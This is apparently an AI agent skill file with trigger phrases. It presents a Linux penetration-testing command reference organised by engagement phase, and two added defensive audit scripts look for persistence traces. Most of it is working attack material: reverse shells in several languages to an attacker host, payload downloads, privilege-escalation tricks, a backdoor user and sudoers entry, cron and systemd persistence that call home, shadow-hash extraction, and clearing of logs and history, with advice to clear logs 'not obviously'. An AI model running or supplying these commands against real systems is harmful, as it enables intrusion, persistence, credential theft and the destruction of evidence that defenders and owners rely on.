---
name: linux-pentester-practical-commands
description: Practical Linux command reference and techniques for penetration testing operations covering reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation
triggers:
- how do I use linux commands for pentesting
- show me reconnaissance commands for linux
- what are common privilege escalation techniques on linux
- help me enumerate services on a linux target
- how to perform post exploitation on linux systems
- what commands do pentesters use for linux enumeration
- show me practical linux exploitation commands
- help with linux penetration testing workflow
---
# Linux Pentester Practical Commands
> Skill by [ara.so](https://ara.so) — Security Skills collection.
## Overview
Linux for a Pentester is a curated collection of practical penetration testing commands and techniques organized by engagement phase. This resource provides real-world command-line operations used during security assessments, CTFs, and penetration testing exercises on Linux systems.
The repository is structured around the penetration testing kill chain: reconnaissance, enumeration, exploitation, privilege escalation, and post-exploitation.
## Installation
This is a reference repository, not a software package. Clone it for local reference:
```bash
git clone https://github.com/HIMANSHUSHARMA20/Linux-for-a-Pentester.git
cd Linux-for-a-Pentester
```
Keep it accessible during engagements:
```bash
# Add to your path or create an alias
alias pentref='cd ~/tools/Linux-for-a-Pentester && ls'
# Or use it via grep for quick lookups
grep -r "find.*suid" ~/tools/Linux-for-a-Pentester/
```
## Repository Structure
The repository is organized into six main modules:
- **00-General-Commands**: Basic Linux survival commands
- **01-Recon**: Local and network reconnaissance
- **02-Enumeration**: Service and user enumeration
- **03-Exploitation**: Initial access techniques
- **04-Privilege-Escalation**: Escalation to root/admin
- **05-Post-Exploitation**: Persistence and lateral movement
- **Cheatsheets**: Quick reference one-liners
## Key Command Categories
### Reconnaissance Commands
Network and system discovery during initial access:
```bash
# Network interface enumeration
ip addr
ip a show
ifconfig -a
# Routing table inspection
ip route
route -n
netstat -rn
# Active connections and listening ports
ss -tunlp
netstat -tunlp
lsof -i
# ARP cache inspection
ip neigh
arp -a
# DNS enumeration
cat /etc/resolv.conf
cat /etc/hosts
# Firewall rules
iptables -L -n -v
nft list ruleset
# Running processes
ps aux
ps -ef
pstree -p
# System information
uname -a
cat /etc/os-release
lsb_release -a
hostnamectl
```
### Enumeration Techniques
Deep enumeration for privilege escalation vectors:
```bash
# User enumeration
id
whoami
groups
cat /etc/passwd
cat /etc/shadow # if accessible
cat /etc/group
# SUID/SGID binaries
find / -perm -4000 -type f 2>/dev/null
find / -perm -2000 -type f 2>/dev/null
find / -perm -6000 -type f 2>/dev/null
# Writable directories
find / -writable -type d 2>/dev/null
find / -perm -222 -type d 2>/dev/null
find / -perm -o=w -type d 2>/dev/null
# World-writable files
find / -perm -2 -type f 2>/dev/null
# Files owned by current user
find / -user $(whoami) 2>/dev/null
# Sudo permissions
sudo -l
# Capabilities
getcap -r / 2>/dev/null
# Cron jobs
cat /etc/crontab
ls -la /etc/cron.*
crontab -l
cat /var/spool/cron/crontabs/*
# Service enumeration
systemctl list-units --type=service
service --status-all
# Listening services with PIDs
ss -tlnp
netstat -tlnp
# Environment variables
env
cat /proc/*/environ 2>/dev/null | tr '\0' '\n'
# Mounted filesystems
mount
cat /etc/fstab
df -h
# SSH keys
find / -name id_rsa 2>/dev/null
find / -name authorized_keys 2>/dev/null
ls -la ~/.ssh/
```
### Exploitation Techniques
Common exploitation patterns during pentests:
```bash
# Reverse shell - Bash
bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1
bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1'
# Reverse shell - Netcat
nc -e /bin/bash $ATTACKER_IP 4444
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc $ATTACKER_IP 4444 >/tmp/f
# Reverse shell - Python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("$ATTACKER_IP",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
# Reverse shell - PHP
php -r '$sock=fsockopen("$ATTACKER_IP",4444);exec("/bin/sh -i <&3 >&3 2>&3");'
# Upgrade to interactive shell
python -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
# Then background with Ctrl+Z and run:
# stty raw -echo; fg
# export TERM=xterm
# File transfer - Wget
wget http://$ATTACKER_IP:8000/file -O /tmp/file
# File transfer - Curl
curl http://$ATTACKER_IP:8000/file -o /tmp/file
# File transfer - Base64
echo "base64_encoded_content" | base64 -d > /tmp/file
# Simple HTTP server for exfil
python3 -m http.server 8000
```
### Privilege Escalation Vectors
Common privilege escalation techniques:
```bash
# SUID binary exploitation example - cp
# If cp has SUID bit
/usr/bin/cp /etc/shadow /tmp/shadow.bak
# Then crack or read
# GTFOBins - Find
# If find has SUID
find . -exec /bin/bash -p \; -quit
# Sudo exploitation - less
# If sudo less is allowed
sudo less /etc/profile
# Then type: !/bin/bash
# Sudo exploitation - vim
# If sudo vim is allowed
sudo vim -c ':!/bin/bash'
# Writable /etc/passwd exploitation
openssl passwd -1 -salt xyz password
echo 'hacker:$1$xyz$hash:0:0:root:/root:/bin/bash' >> /etc/passwd
# Path hijacking
echo '/bin/bash' > /tmp/ls
chmod +x /tmp/ls
export PATH=/tmp:$PATH
# LD_PRELOAD exploitation
# Create evil.c
gcc -fPIC -shared -o /tmp/evil.so evil.c -nostartfiles
sudo LD_PRELOAD=/tmp/evil.so program
# Cron job hijacking
# If writable cron script exists
echo 'cp /bin/bash /tmp/rootbash; chmod +s /tmp/rootbash' >> /path/to/cronjob.sh
# Kernel exploits
uname -a
searchsploit "Linux Kernel $(uname -r | cut -d'-' -f1)"
# Docker escape
# If user in docker group
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# Check for automated enumeration scripts
# LinPEAS
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh | sh
# LinEnum
./LinEnum.sh -t
# Linux Exploit Suggester
./linux-exploit-suggester.sh
```
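As a defensive counterpart to the escalation vectors above, the following audit script (added here, not part of the Linux-for-a-Pentester repository) checks a host for the preconditions those techniques depend on: extra UID-0 accounts, NOPASSWD or LD_PRELOAD sudoers entries, SUID/SGID files outside an allow-list, group- or world-writable cron scripts, and accounts with usable password hashes. The function names and the one-path-per-line allow-list format are my own choices.

```bash
#!/bin/bash
# Defensive audit helpers for the escalation preconditions listed above.
# Every function takes file or directory paths, so it can be pointed at a
# mounted disk image or a configuration backup as well as the live system.

# UID-0 accounts other than root: the trace of an appended /etc/passwd line.
extra_uid0_users() {               # usage: extra_uid0_users [passwd_file]
    awk -F: '$3 == 0 && $1 != "root" { print $1 }' "${1:-/etc/passwd}"
}

# Uncommented sudoers lines granting NOPASSWD or mentioning LD_PRELOAD (env_keep).
risky_sudoers_lines() {            # usage: risky_sudoers_lines sudoers_file...
    grep -hE '^[^#]*(NOPASSWD|LD_PRELOAD)' "$@" 2>/dev/null || true
}

# SUID/SGID files under search_root whose full path is not in the allow-list.
unexpected_setuid() {              # usage: unexpected_setuid allowlist_file search_root
    find "$2" -xdev -type f \( -perm -4000 -o -perm -2000 \) 2>/dev/null \
        | grep -vxFf "$1" || true
}

# Cron scripts writable by group or others: the cron-hijack precondition.
writable_cron_scripts() {          # usage: writable_cron_scripts cron_dir...
    find "$@" -type f \( -perm -g=w -o -perm -o=w \) 2>/dev/null || true
}

# Accounts whose shadow entry holds a real hash (not locked with ! or *, not
# empty), to compare against the expected list of interactive accounts.
accounts_with_hash() {             # usage: accounts_with_hash [shadow_file]
    awk -F: '$2 !~ /^[*!]/ && $2 != "" { print $1 }' "${1:-/etc/shadow}" 2>/dev/null || true
}

# Run every check against the live system and print a short report.
audit_report() {
    echo "[*] Extra UID-0 accounts:";          extra_uid0_users
    echo "[*] Risky sudoers entries:";         risky_sudoers_lines /etc/sudoers /etc/sudoers.d/*
    echo "[*] Group/world-writable cron scripts:"
    writable_cron_scripts /etc/cron.d /etc/cron.hourly /etc/cron.daily /etc/cron.weekly /etc/cron.monthly
    echo "[*] Accounts with usable password hashes:"; accounts_with_hash
}

if [ "${1:-}" = "--run" ]; then
    audit_report
fi
```

Run it as `./audit.sh --run` on the host, or call the individual functions against files copied from an image; each function prints one finding per line and exits 0 even when nothing is found.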
### Post-Exploitation Activities
Maintaining access and lateral movement:
```bash
# Add SSH key for persistence
mkdir -p /root/.ssh
echo "ssh-rsa YOUR_PUBLIC_KEY" >> /root/.ssh/authorized_keys
chmod 600 /root/.ssh/authorized_keys
# Create backdoor user
useradd -m -s /bin/bash backdoor
echo 'backdoor:password' | chpasswd
usermod -aG sudo backdoor
# Add to sudoers
echo 'backdoor ALL=(ALL) NOPASSWD:ALL' >> /etc/sudoers
# Cron persistence
(crontab -l ; echo "@reboot /bin/bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1'") | crontab -
# Service persistence
cat > /etc/systemd/system/backdoor.service << EOF
[Unit]
Description=Backdoor Service
[Service]
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/$ATTACKER_IP/4444 0>&1'
Restart=always
[Install]
WantedBy=multi-user.target
EOF
systemctl enable backdoor.service
# Password hash extraction
cat /etc/shadow | grep -v '*' | grep -v '!'
# History clearing
history -c
rm ~/.bash_history
ln -s /dev/null ~/.bash_history
# Log clearing
echo "" > /var/log/auth.log
echo "" > /var/log/syslog
echo "" > ~/.bash_history
# Find interesting files
find / -name "*.conf" 2>/dev/null | grep -v proc
find / -name "*.bak" 2>/dev/null
find / -name "*password*" 2>/dev/null
find / -name "*.db" 2>/dev/null
# Credential hunting
grep -r "password" /etc/ 2>/dev/null
grep -r "PASS" /var/www/ 2>/dev/null
grep -r "DB_PASSWORD" /var/www/ 2>/dev/null
# Network pivoting with SSH
ssh -L 8080:internal_server:80 user@compromised_host
ssh -D 1080 user@compromised_host # SOCKS proxy
# Port forwarding with socat
socat TCP-LISTEN:8080,fork TCP:internal_server:80
```
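The persistence and anti-forensics commands above each leave a recognisable footprint; the following checks (an added example, not code from the repository) look for exactly those traces: @reboot crontab entries, unit files whose ExecStart spawns an interactive or network-connected shell, recently changed authorized_keys files, and log files that were truncated rather than rotated. Function names, the seven-day default and the regular expression are my own assumptions.

```bash
#!/bin/bash
# Persistence-indicator checks for the post-exploitation techniques above.
# Paths are arguments so the checks also work on a mounted image or backup.

# @reboot entries in crontab files, printed with the file they came from.
reboot_cron_entries() {            # usage: reboot_cron_entries crontab_file...
    grep -HE '^[[:space:]]*@reboot' "$@" 2>/dev/null || true
}

# Unit files whose ExecStart* line runs an interactive shell or a raw socket
# tool. "(^|[^a-z])(ba)?sh -i" deliberately does not match "ssh -i keyfile".
shell_spawning_units() {           # usage: shell_spawning_units unit_dir...
    find "$@" -type f -name '*.service' -exec grep -lE \
        '^Exec(Start|StartPre|StartPost)=.*(/dev/tcp/|(^|[^a-z])(ba)?sh -i| nc | ncat |socat )' \
        {} + 2>/dev/null || true
}

# authorized_keys files modified within the last N days (default 7).
recent_authorized_keys() {         # usage: recent_authorized_keys search_root [days]
    find "$1" -xdev -type f -name authorized_keys -mtime "-${2:-7}" 2>/dev/null || true
}

# Log files of 0 or 1 bytes: `echo "" > /var/log/auth.log` leaves a single
# newline, so files under 2 bytes are flagged, not only empty ones.
emptied_logs() {                   # usage: emptied_logs log_dir
    find "$1" -maxdepth 1 -type f -size -2c 2>/dev/null || true
}

# Report against the usual live-system locations.
persistence_report() {
    echo "[*] @reboot cron entries:"
    reboot_cron_entries /etc/crontab /etc/cron.d/* /var/spool/cron/crontabs/*
    echo "[*] Units spawning shells:"; shell_spawning_units /etc/systemd/system
    echo "[*] authorized_keys changed in the last 7 days:"; recent_authorized_keys /home /root
    echo "[*] Truncated logs:"; emptied_logs /var/log
}

if [ "${1:-}" = "--run" ]; then
    persistence_report
fi
```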
## Common Patterns
### Initial Foothold Workflow
```bash
# 1. Initial reconnaissance
whoami && id && hostname
uname -a
cat /etc/os-release
# 2. Check sudo permissions
sudo -l
# 3. Find SUID binaries
find / -perm -4000 2>/dev/null
# 4. Check writable files
find / -writable -type f 2>/dev/null | grep -v proc
# 5. Check running services
ps aux
ss -tlnp
# 6. Enumerate users
cat /etc/passwd | grep -v nologin | grep -v false
# 7. Check cron jobs
cat /etc/crontab
ls -la /etc/cron.*
```
### Enumeration Script Pattern
```bash
#!/bin/bash
# Quick enumeration script
echo "[*] System Information"
uname -a
cat /etc/os-release
echo "[*] Current User"
whoami && id
echo "[*] Sudo Permissions"
sudo -l 2>/dev/null
echo "[*] SUID Binaries"
find / -perm -4000 -type f 2>/dev/null
echo "[*] Interesting Files"
find / -name "*.conf" -o -name "*.bak" 2>/dev/null | head -20
echo "[*] Network Connections"
ss -tunlp 2>/dev/null || netstat -tunlp 2>/dev/null
echo "[*] Users with Shell"
cat /etc/passwd | grep -v nologin | grep -v false
```
## Troubleshooting
### Limited Shell Issues
If you have a limited shell, try these escape techniques:
```bash
# Python pty spawn
python -c 'import pty; pty.spawn("/bin/bash")'
# Echo method
echo os.system('/bin/bash')
# Expect spawn
expect -c 'spawn /bin/bash; interact'
# VI escape
vi
:set shell=/bin/bash
:shell
# AWK escape
awk 'BEGIN {system("/bin/bash")}'
```
### Missing Commands
Some systems may have limited binaries. Alternatives:
```bash
# No netcat - use bash
bash -i >& /dev/tcp/$IP/4444 0>&1
# No wget - use curl
curl http://example.com/file -o output
# No curl - use wget
wget http://example.com/file -O output
# No python - use perl
perl -e 'use Socket;$i="$IP";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
```
### File Transfer Issues
When standard methods fail:
```bash
# Base64 encode on attacker, decode on target
cat file | base64 -w 0
# On target:
echo "base64_string" | base64 -d > file
# Using dev/tcp
cat < /dev/tcp/$ATTACKER_IP/80 > file
# Using dd
dd if=/dev/tcp/$ATTACKER_IP/8000 of=/tmp/file
# Using hexdump
xxd -p file | tr -d '\n'
# On target:
echo "hex_string" | xxd -r -p > file
```
## Integration with Pentesting Workflow
This reference is designed to complement automated tools:
```bash
# Run automated enumeration
./linpeas.sh | tee linpeas_output.txt
# Cross-reference with manual commands
grep -i "suid" linpeas_output.txt
# Manually verify findings
find / -perm -4000 2>/dev/null | xargs ls -la
# Test exploitation manually
sudo -l # If linpeas found sudo access
```
## Best Practices
1. **Always stabilize shells immediately** after getting initial access
2. **Document all commands executed** during engagement for reporting
3. **Check multiple enumeration vectors** - automated tools miss things
4. **Verify writable paths** before attempting exploitation
5. **Test privilege escalation** in isolated environment when possible
6. **Clean up artifacts** during post-exploitation phase
7. **Use encryption** for sensitive data exfiltration
8. **Maintain operational security** - clear logs selectively, not obviously
## Reference During Engagement
Quick lookup patterns:
```bash
# Quick SUID check
find / -perm -4000 2>/dev/null | grep -E '(vim|nano|find|nmap|python|perl|ruby|bash)'
# Quick sudo check for common escalation vectors
sudo -l 2>/dev/null | grep -E '(vim|nano|find|nmap|less|more|man|awk|python|perl)'
# Quick writable check
find / -writable 2>/dev/null | grep -E '(\.py$|\.sh$|cron|systemd)' | grep -v proc
```
This skill provides practical, battle-tested Linux commands for penetration testing operations organized by engagement phase.
Creator's repository · aradotso/security-skills